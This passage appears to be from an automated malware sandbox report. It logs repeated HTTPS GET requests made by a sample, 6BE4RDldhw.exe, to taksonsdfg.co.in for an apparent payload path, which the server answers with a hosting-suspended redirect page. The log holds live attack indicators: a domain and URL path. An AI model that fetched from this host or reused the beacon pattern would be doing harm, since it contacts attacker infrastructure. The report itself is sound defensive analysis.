                                2024-11-26 07:13:36 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                2024-11-26 07:13:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                40192.168.2.749956108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:13:38 UTC194OUTGET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:13:38 UTC446INHTTP/1.1 302 Found
                                Connection: close
                                content-type: text/html
                                content-length: 771
                                date: Tue, 26 Nov 2024 07:13:38 GMT
                                server: LiteSpeed
                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:13:38 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                41192.168.2.749962108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:13:40 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:13:40 UTC325INHTTP/1.1 200 OK
                                Connection: close
                                content-type: text/html
                                transfer-encoding: chunked
                                date: Tue, 26 Nov 2024 07:13:40 GMT
                                server: LiteSpeed
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:13:40 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                2024-11-26 07:13:40 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                2024-11-26 07:13:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                42192.168.2.749969108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:13:42 UTC194OUTGET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:13:43 UTC446INHTTP/1.1 302 Found
                                Connection: close
                                content-type: text/html
                                content-length: 771
                                date: Tue, 26 Nov 2024 07:13:42 GMT
                                server: LiteSpeed
                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:13:43 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                43192.168.2.749975108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:13:44 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:13:45 UTC325INHTTP/1.1 200 OK
                                Connection: close
                                content-type: text/html
                                transfer-encoding: chunked
                                date: Tue, 26 Nov 2024 07:13:44 GMT
                                server: LiteSpeed
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:13:45 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                2024-11-26 07:13:45 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                2024-11-26 07:13:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                44192.168.2.749982108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:13:46 UTC194OUTGET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:13:47 UTC446INHTTP/1.1 302 Found
                                Connection: close
                                content-type: text/html
                                content-length: 771
                                date: Tue, 26 Nov 2024 07:13:46 GMT
                                server: LiteSpeed
                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:13:47 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                45192.168.2.749987108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:13:48 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:13:49 UTC325INHTTP/1.1 200 OK
                                Connection: close
                                content-type: text/html
                                transfer-encoding: chunked
                                date: Tue, 26 Nov 2024 07:13:48 GMT
                                server: LiteSpeed
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:13:49 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                2024-11-26 07:13:49 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                2024-11-26 07:13:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                46192.168.2.749994108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:13:50 UTC194OUTGET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:13:51 UTC446INHTTP/1.1 302 Found
                                Connection: close
                                content-type: text/html
                                content-length: 771
                                date: Tue, 26 Nov 2024 07:13:51 GMT
                                server: LiteSpeed
                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:13:51 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                47192.168.2.749998108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:13:52 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:13:53 UTC325INHTTP/1.1 200 OK
                                Connection: close
                                content-type: text/html
                                transfer-encoding: chunked
                                date: Tue, 26 Nov 2024 07:13:53 GMT
                                server: LiteSpeed
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:13:53 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                2024-11-26 07:13:53 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                2024-11-26 07:13:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                48192.168.2.750007108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:13:55 UTC194OUTGET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:13:55 UTC446INHTTP/1.1 302 Found
                                Connection: close
                                content-type: text/html
                                content-length: 771
                                date: Tue, 26 Nov 2024 07:13:55 GMT
                                server: LiteSpeed
                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:13:55 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                49192.168.2.750012108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:13:57 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:13:57 UTC325INHTTP/1.1 200 OK
                                Connection: close
                                content-type: text/html
                                transfer-encoding: chunked
                                date: Tue, 26 Nov 2024 07:13:57 GMT
                                server: LiteSpeed
